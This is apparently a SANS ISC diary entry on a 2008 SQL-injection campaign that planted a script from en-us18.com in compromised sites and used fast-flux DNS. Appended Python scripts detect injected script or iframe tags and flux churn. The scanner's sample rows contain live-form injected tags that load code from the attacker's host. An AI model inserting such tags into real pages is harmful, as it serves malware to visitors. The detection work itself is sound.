
SANS ISC: InfoSec Handlers Diary Blog



New sql injection site with fastflux hosting

Published: 2008-06-02
Last Updated: 2008-06-02 22:13:22 UTC
by donald smith (Version: 1)

One of our frequent contributors notified us of a new SQL injection site: the script
hxxp://en-us18.com/b.js is being injected into web pages via SQL injection, so that the compromised sites load it from the attacker's server for every visitor.

When I googled for it, I saw 560 injected web pages.
“b.js injects an iFrame which points to
hxxp://en-us18.com/cgi-bin/index.cgi?ad
which in turn embeds two Flash files:

advert.swf:
http://www.virustotal.com/analisis/d6ffe290e9938d3e646f82c536abd0c7
banner.swf:
http://www.virustotal.com/analisis/83be3d4d30eb60d92272625634a3babc” 
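The diary does not show what the injected markup looks like in the victims' pages. The scanner below is an added example, not code from the diary: it walks text columns dumped from a site's database and reports any script or iframe tag whose src points at a host outside an allowlist, which is how an operator would check their own site after a mass SQL-injection campaign of this kind. The sample rows are constructed; the assumption that the injection appends a bare script tag referencing b.js to a text field is mine, as is the allowlist of legitimate hosts.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ExternalRefFinder(HTMLParser):
    """Record <script src> and <iframe src> tags pointing at hosts outside the allowlist."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        if not src:
            return
        src = src.strip()
        host = urlsplit(src).hostname
        # A relative src (no host) is same-origin content and is not what the
        # injection adds; anything loaded from a host we do not know is reported.
        if host and host.lower() not in self.allowed:
            self.hits.append((tag, src))


def find_external_refs(fragment, allowed_hosts):
    """Return [(tag, src), ...] for suspicious tags in one HTML fragment."""
    parser = ExternalRefFinder(allowed_hosts)
    parser.feed(fragment)
    parser.close()
    return parser.hits


def scan_rows(rows, allowed_hosts):
    """rows are (table, column, primary_key, text); one finding per suspicious tag."""
    findings = []
    for table, column, key, text in rows:
        for tag, src in find_external_refs(text, allowed_hosts):
            findings.append({"table": table, "column": column, "key": key,
                             "tag": tag, "src": src})
    return findings


# Constructed sample rows standing in for text columns dumped from a site's database.
# Row 17 carries the assumed injected form: an unquoted <script src=...b.js> appended
# to the legitimate text. Row 4 carries the iframe the diary says b.js inserts.
SAMPLE_ROWS = [
    ("products", "description", 17,
     "Blue widget, ships in 3 days.<script src=http://en-us18.com/b.js></script>"),
    ("products", "description", 18,
     'Red widget. <img src="/img/red.png"> <script src="/js/cart.js"></script>'),
    ("news", "body", 4,
     "<p>Site maintenance Friday.</p>"
     "<iframe src=\"http://en-us18.com/cgi-bin/index.cgi?ad\" width=0 height=0></iframe>"),
    ("news", "body", 5,
     '<script src="https://cdn.example.com/lib.js"></script><p>All clear.</p>'),
]
ALLOWED_HOSTS = ["www.example.com", "cdn.example.com"]   # assumed legitimate hosts


if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS, ALLOWED_HOSTS):
        print(f"{f['table']}.{f['column']} key={f['key']}: <{f['tag']} src={f['src']}>")
```

Run it against a dump of every free-text column; the allowlist must contain every host your pages legitimately load scripts and frames from, otherwise a CDN shows up as a hit. The scanner reports hosts it does not know rather than matching the one domain in this diary, so it also catches the next campaign's domain.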

Based on the following dig output, the hosting appears to be fast-fluxed, or at least set up to change rapidly: fourteen A records for one name, all with a 10-minute TTL.

dig www.en-us18.com
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr rd ra; QUERY: 1, ANSWER: 14, AUTHORITY: 4, ADDITIONAL: 1
;; QUERY SECTION:
;;      www.en-us18.com, type = A, class = IN
;; ANSWER SECTION:
www.en-us18.com.        10M IN A        156.17.227.218
www.en-us18.com.        10M IN A        84.121.210.189
www.en-us18.com.        10M IN A        99.194.80.27
www.en-us18.com.        10M IN A        69.65.91.5
www.en-us18.com.        10M IN A        83.27.126.102
www.en-us18.com.        10M IN A        99.225.66.211
www.en-us18.com.        10M IN A        82.159.61.76
www.en-us18.com.        10M IN A        85.53.64.13
www.en-us18.com.        10M IN A        148.81.132.211
www.en-us18.com.        10M IN A        83.23.188.93
www.en-us18.com.        10M IN A        216.170.109.251
www.en-us18.com.        10M IN A        62.21.81.188
www.en-us18.com.        10M IN A        83.242.74.153
www.en-us18.com.        10M IN A        87.205.33.92
;; AUTHORITY SECTION:
en-us18.com.            1d18h57m52s IN NS  ns3.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns2.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns4.en-us18.com.
en-us18.com.            1d18h57m52s IN NS  ns1.en-us18.com.
;; ADDITIONAL SECTION:
ns1.en-us18.com.        1d21h10m38s IN A  75.110.190.181

A second dig a few minutes later produced a similar but slightly different set of addresses, so the A records for this domain are rotating. I guess they got tired of people blackholing their IP address. Blocking individual addresses cannot keep up with a set that changes every few minutes, so in that case I would recommend you DNS blackhole the domain itself: blackholing en-us18.com covers www.en-us18.com as well as the nameservers ns1 through ns4, which all live inside the same zone.
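The reasoning above (many A records, a short TTL, and a different set on the next lookup) can be turned into a repeatable check. The script below is an added example, not code from the diary: it parses dig transcripts in the BIND 8 format shown above, converts the TTL spellings ("10M", "1d18h57m52s") to seconds, and compares two successive lookups to report the fast-flux indicators. The first transcript is built from the fourteen addresses in the diary; the second is constructed to stand in for the "slightly different" follow-up lookup, dropping four of them and adding four RFC 5737 documentation addresses, since the diary does not list the second result. The thresholds (TTL of 600 seconds or less, five or more addresses) are assumptions.

```python
import re
from dataclasses import dataclass, field

# One resource record line as printed by dig. BIND 8 dig prints TTLs such as
# "10M" or "1d18h57m52s"; newer dig prints plain seconds, handled as well.
RR_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\w+)\s+IN\s+(?P<type>A|NS)\s+(?P<rdata>\S+)$")
TTL_UNITS = {"w": 604800, "d": 86400, "h": 3600, "m": 60, "s": 1}


def parse_ttl(text):
    """'10M' -> 600, '1d18h57m52s' -> 154672, '600' -> 600."""
    if text.isdigit():
        return int(text)
    return sum(int(n) * TTL_UNITS[u.lower()]
               for n, u in re.findall(r"(\d+)([wdhmsWDHMS])", text))


@dataclass
class Lookup:
    a_records: dict = field(default_factory=dict)   # owner -> {ip: ttl seconds}
    ns_records: dict = field(default_factory=dict)  # zone  -> {nameserver, ...}


def parse_dig(output):
    """Collect A and NS records from a dig transcript; ';;' comment lines are skipped."""
    lk = Lookup()
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if not m:
            continue
        owner = m["name"].rstrip(".").lower()
        rdata = m["rdata"].rstrip(".").lower()
        if m["type"] == "A":
            lk.a_records.setdefault(owner, {})[rdata] = parse_ttl(m["ttl"])
        else:
            lk.ns_records.setdefault(owner, set()).add(rdata)
    return lk


def flux_indicators(first, second, name, zone, max_ttl=600, min_addrs=5):
    """Compare two successive lookups of `name` and return the fast-flux indicators."""
    a1 = first.a_records.get(name, {})
    a2 = set(second.a_records.get(name, {}))
    ttl = max(a1.values()) if a1 else None
    nses = first.ns_records.get(zone, set())
    churn = len(a2 - set(a1)) / len(a2) if a2 else 0.0
    ind = {
        "addresses": len(a1),
        "ttl": ttl,
        "short_ttl": ttl is not None and ttl <= max_ttl,
        "many_addresses": len(a1) >= min_addrs,
        # Nameservers inside the zone itself: blackholing the zone also stops
        # resolution of the NS names, so one block covers everything.
        "in_bailiwick_ns": bool(nses) and all(ns.endswith("." + zone) for ns in nses),
        "churn": churn,   # share of second-lookup addresses absent from the first
    }
    # A single lookup cannot show rotation; the verdict needs churn, as the diary's
    # second dig did.
    ind["likely_fast_flux"] = ind["short_ttl"] and ind["many_addresses"] and churn > 0
    return ind


# Constructed transcripts in the diary's dig format. FIRST_IPS are the fourteen
# addresses from the diary; SECOND_IPS is an assumed rotated set (four dropped,
# four RFC 5737 documentation addresses added), not a real second lookup.
FIRST_IPS = ["156.17.227.218", "84.121.210.189", "99.194.80.27", "69.65.91.5",
             "83.27.126.102", "99.225.66.211", "82.159.61.76", "85.53.64.13",
             "148.81.132.211", "83.23.188.93", "216.170.109.251", "62.21.81.188",
             "83.242.74.153", "87.205.33.92"]
SECOND_IPS = FIRST_IPS[4:] + ["192.0.2.10", "192.0.2.11", "198.51.100.7", "198.51.100.8"]


def make_dig(ips, ttl="10M"):
    """Render a BIND 8 style dig transcript for www.en-us18.com (constructed input)."""
    lines = [";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6",
             ";; QUERY SECTION:", ";;      www.en-us18.com, type = A, class = IN",
             ";; ANSWER SECTION:"]
    lines += [f"www.en-us18.com.        {ttl} IN A        {ip}" for ip in ips]
    lines += [";; AUTHORITY SECTION:"]
    lines += [f"en-us18.com.            1d18h57m52s IN NS  ns{i}.en-us18.com."
              for i in (3, 2, 4, 1)]
    lines += [";; ADDITIONAL SECTION:",
              "ns1.en-us18.com.        1d21h10m38s IN A  75.110.190.181"]
    return "\n".join(lines)


DIG_FIRST = make_dig(FIRST_IPS)
DIG_SECOND = make_dig(SECOND_IPS)

if __name__ == "__main__":
    result = flux_indicators(parse_dig(DIG_FIRST), parse_dig(DIG_SECOND),
                             "www.en-us18.com", "en-us18.com")
    for key, value in result.items():
        print(f"{key:17} {value}")
```

In practice, feed it the output of two dig runs spaced at least one TTL apart (here ten minutes), otherwise a caching resolver hands back the same answer and churn reads as zero. A large, short-TTL answer on its own is also how legitimate CDNs look; it is the steady churn of addresses from unrelated networks, as in the diary's list, that separates a flux network from load balancing.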
